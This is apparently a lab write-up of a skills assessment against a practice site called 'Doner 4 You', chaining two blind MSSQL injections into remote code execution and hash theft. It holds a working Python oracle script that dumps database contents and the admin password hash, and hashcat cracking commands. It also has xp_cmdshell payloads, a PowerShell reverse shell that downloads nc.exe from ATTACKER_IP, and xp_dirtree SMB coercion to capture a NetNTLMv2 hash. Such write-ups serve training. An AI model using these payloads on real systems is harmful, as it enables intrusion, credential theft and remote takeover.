Skills Assessment

Scenario

Target: Doner 4 You website Claimed Stack: "HTML + CSS" 🤔

Objectives:

Find and exploit blind SQLi to dump admin password
Crack the hash and login
Find second SQLi and gain RCE
Capture and crack NetNTLM hash

Phase 1: Discovery

Finding the Injection Point

Intercept requests and notice TrackingId cookie - likely stored in database.

Testing for Time-based SQLi

Payload:

';IF(1=1) WAITFOR DELAY '0:0:10';--

URL Encode:

printf %s "';IF(1=1) WAITFOR DELAY '0:0:10';--" | jq -Rr @uri

Result: 10 second delay = SQLi confirmed!

Phase 2: Database Enumeration

Oracle Script

import requests, time, sys
from urllib.parse import quote

DELAY = 3

def oracle(q):
    start = time.time()
    payload = quote(f"';IF({q}) WAITFOR DELAY '0:0:{DELAY}';--")
    r = requests.get(
        "http://<TARGET>/index.php",
        cookies={"TrackingId": payload}
    )
    return time.time() - start >= DELAY

def dumpNumber(q):
    length = 0
    for p in range(0, 7):
        if oracle(f"({q}) & {2**p} > 0"):
            length |= 2**p
    return length

def dumpString(q, length):
    string = ""
    for i in range(1, length + 1):
        character = 0
        for p in range(0, 7):
            if oracle(f"ASCII(SUBSTRING(({q}), {i}, 1)) & {2**p} > 0"):
                character |= 2**p
        string += chr(character)
    return string

Step 1: Database Name

databaseNameLength = dumpNumber("LEN(DB_NAME())")  # → 3
databaseName = dumpString("DB_NAME()", databaseNameLength)  # → d4y

Step 2: Table Count

databaseName = "d4y"
numberOfTables = dumpNumber(
    f"SELECT COUNT(*) FROM information_schema.tables WHERE TABLE_CATALOG='{databaseName}';"
)  # → 15

Step 3: Table Names

for i in range(numberOfTables):
    tableNameLength = dumpNumber(
        f"SELECT LEN(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES "
        f"WHERE TABLE_CATALOG='{databaseName}' "
        f"ORDER BY TABLE_NAME OFFSET {i} ROWS FETCH NEXT 1 ROWS ONLY"
    )
    tableName = dumpString(
        f"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES "
        f"WHERE TABLE_CATALOG='{databaseName}' "
        f"ORDER BY TABLE_NAME OFFSET {i} ROWS FETCH NEXT 1 ROWS ONLY",
        tableNameLength
    )
    print(tableName)

Results: captcha, tracking, users (+ system tables)

Step 4: Column Names (users table)

tableName = "users"
numberOfColumns = dumpNumber(
    f"SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS "
    f"WHERE TABLE_NAME='users' AND TABLE_CATALOG='{databaseName}'"
)  # → 3

# Columns: email, password, role

Step 5: Row Count

numberOfRows = dumpNumber("SELECT COUNT(*) FROM users")  # → 1

Step 6: Extract Admin Credentials

# Password hash
row1Length = dumpNumber("SELECT TOP 1 LEN(password) FROM users")
passwordHash = dumpString("SELECT TOP 1 password FROM users", row1Length)

# Email
emailLength = dumpNumber("SELECT TOP 1 LEN(email) FROM users")
email = dumpString("SELECT TOP 1 email FROM users", emailLength)
# → admin@d4y.at

Phase 3: Crack Password Hash

hashcat -m 0 -w 3 -O '<HASH>' /usr/share/wordlists/rockyou.txt

Credentials obtained: admin@d4y.at:<PASSWORD>

Phase 4: Second SQLi → RCE

Use cracked credentials to login.

Find Second Injection

Navigate to "Create Post" - fuzz all fields.

Vulnerable field: captchaAnswer

Test Time-based SQLi

';IF(1=1) WAITFOR DELAY '0:0:10';--

10 second delay = SQLi confirmed!

Enable xp_cmdshell

Step 1: Enable Advanced Options

5';EXEC sp_configure 'Show Advanced Options', '1';RECONFIGURE;--

curl http://<TARGET>/new.php \
  -H 'Cookie: PHPSESSID=<SESSION>' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -d "title=1&message=1&picture=&captchaId=26&captchaAnswer=<URL_ENCODED_PAYLOAD>"

Step 2: Enable xp_cmdshell

5';EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE;--

Get Reverse Shell

PowerShell Payload:

(new-object net.webclient).downloadfile("http://<ATTACKER_IP>:9001/nc.exe", "c:\windows\tasks\nc.exe");
c:\windows\tasks\nc.exe -nv <ATTACKER_IP> 9002 -e c:\windows\system32\cmd.exe;

Encode:

python3 -c 'import base64; print(base64.b64encode((r"""<PAYLOAD>""").encode("utf-16-le")).decode())'

Final SQLi Payload:

5';EXEC xp_cmdshell 'powershell.exe -exec bypass -enc <BASE64>';--

Setup & Execute

# Terminal 1: HTTP server for nc.exe
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
python3 -m http.server 9001

# Terminal 2: Listener
nc -nvlp 9002

# Terminal 3: Send payload
curl http://<TARGET>/new.php \
  -H 'Cookie: PHPSESSID=<SESSION>' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -d "title=1&message=1&picture=&captchaId=26&captchaAnswer=<URL_ENCODED_PAYLOAD>"

Read Flag

type C:\flag.txt

Phase 5: Capture NetNTLM Hash

Start Responder

sudo responder -I tun0

Trigger SMB Authentication

';EXEC master..xp_dirtree '\\<ATTACKER_IP>\myshare', 1, 1;--

URL Encode:

printf %s "';EXEC master..xp_dirtree '\\\\<ATTACKER_IP>\\myshare', 1, 1;--" | jq -rR @uri

Send via SQLi

curl http://<TARGET>/new.php \
  -H 'Cookie: PHPSESSID=<SESSION>' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -d "title=1&message=1&picture=&captchaId=26&captchaAnswer=<URL_ENCODED_PAYLOAD>"

Capture Hash

[SMB] NTLMv2-SSP Client   : <TARGET_IP>
[SMB] NTLMv2-SSP Username : SQL02\Murat
[SMB] NTLMv2-SSP Hash     : Murat::SQL02:...<SNIP>...

Crack Hash

hashcat -m 5600 -w 3 -O '<HASH>' /usr/share/wordlists/rockyou.txt

Attack Chain Summary

1. TrackingId Cookie → Time-based SQLi
         ↓
2. Enumerate: DB → Tables → Columns → Data
         ↓
3. Extract admin password hash
         ↓
4. Crack hash with hashcat (mode 0)
         ↓
5. Login as admin
         ↓
6. captchaAnswer field → Time-based SQLi
         ↓
7. Enable xp_cmdshell
         ↓
8. PowerShell reverse shell → RCE
         ↓
9. Read flag from C:\flag.txt
         ↓
10. xp_dirtree → Capture NetNTLM hash
         ↓
11. Crack hash with hashcat (mode 5600)

Techniques Used

Technique

Phase

Time-based Blind SQLi

Discovery

SQL-Anding extraction

Enumeration

Hash cracking (MD5)

Credential access

xp_cmdshell RCE

Exploitation

PowerShell encoded payload

Evasion

xp_dirtree SMB coercion

Hash capture

NetNTLMv2 cracking

Credential access

Key Learnings

Check all input vectors - Cookies, headers, form fields
Time-based SQLi - Useful when no visible output
SQL-Anding - Efficient extraction (7 requests/char)
Chain vulnerabilities - SQLi → RCE → Hash capture
Multiple injection points - Same app can have several

PreviousPrevention NextWhitebox Pentesting

Last updated 1 month ago

hashtagScenario

hashtagPhase 1: Discovery

hashtagFinding the Injection Point

hashtagTesting for Time-based SQLi

hashtagPhase 2: Database Enumeration

hashtagOracle Script

hashtagStep 1: Database Name

hashtagStep 2: Table Count

hashtagStep 3: Table Names

hashtagStep 4: Column Names (users table)

hashtagStep 5: Row Count

hashtagStep 6: Extract Admin Credentials

hashtagPhase 3: Crack Password Hash

hashtagPhase 4: Second SQLi → RCE

hashtagLogin as Admin

hashtagFind Second Injection

hashtagTest Time-based SQLi

hashtagEnable xp_cmdshell

hashtagGet Reverse Shell

hashtagSetup & Execute

hashtagRead Flag

hashtagPhase 5: Capture NetNTLM Hash

hashtagStart Responder

hashtagTrigger SMB Authentication

hashtagSend via SQLi

hashtagCapture Hash

hashtagCrack Hash

hashtagAttack Chain Summary

hashtagTechniques Used

hashtagKey Learnings